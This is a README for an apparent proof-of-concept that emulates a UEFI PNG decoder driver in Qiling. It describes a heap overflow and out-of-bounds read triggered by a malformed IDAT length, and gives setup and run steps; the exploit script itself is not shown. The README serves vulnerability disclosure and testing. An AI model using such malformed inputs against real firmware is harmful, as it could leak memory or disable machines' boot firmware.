README: Emulating and Exploiting UEFI Example

Project Overview

This Proof of Concept (PoC) demonstrates a Heap-Based Buffer Overflow, and Out-of-Bounds Read within the PngDecoderDxe.bin UEFI driver

The vulnerability is triggered by a lack of length validation in the PNG decompression loop, allowing a malformed IDAT chunk to read or write past the intended memory boundaries.

File Descriptions

poc.py: The Qiling-based emulation script used for Active Testing. lenna.gold: A valid PNG file ($473,831$ bytes) used for Passive Reconnaissance to establish a baseline of "Good" behavior. lenna.poisoned: A malformed PNG file with a manipulated IDAT length field designed to trigger the memory corruption. PngDecoderDxe.bin: The target UEFI driver

Prerequisites & Installation

This project requires the Qiling Framework to emulate the UEFI environment. It is recommended to use a virtual environment to manage dependencies.

1. Clone and Install Dependencies:

   Bash

   Clone the Qiling repository

   git clone https://github.com/qilingframework/qiling.git cd qiling

   Install Qiling and its dependencies

   pip3 install -r requirements.txt python3 setup.py install

Instructions for Testing

To validate the vulnerability, follow these steps

1. Baseline Test (The "Gold" Image) Confirm the driver handles valid data correctly within the established 473,831 byte boundary ( the image size)

Bash

  cp lenna.gold lenna.png
  python3 poc.py

Expected Result: The script should report "FINAL EXTRACTION: Dumping from 0x60419000". Note: Ignore the "decompression failed" result, as the program ends the decoding before it completes.

2. Vulnerability Test (The "Poisoned" Image)

Trigger the Out-of-Bounds Read by providing the malformed asset.

Bash
  cp lenna.poisoned lenna.png
  python3 poc.py

Expected Result: The script will trigger a CRITICAL SYSTEM ABORT at the page boundary 0x9076000.

Impact: This demonstrates an arbitrary out-of-bounds read that could result in a leak of information or a DOS of the BIOS.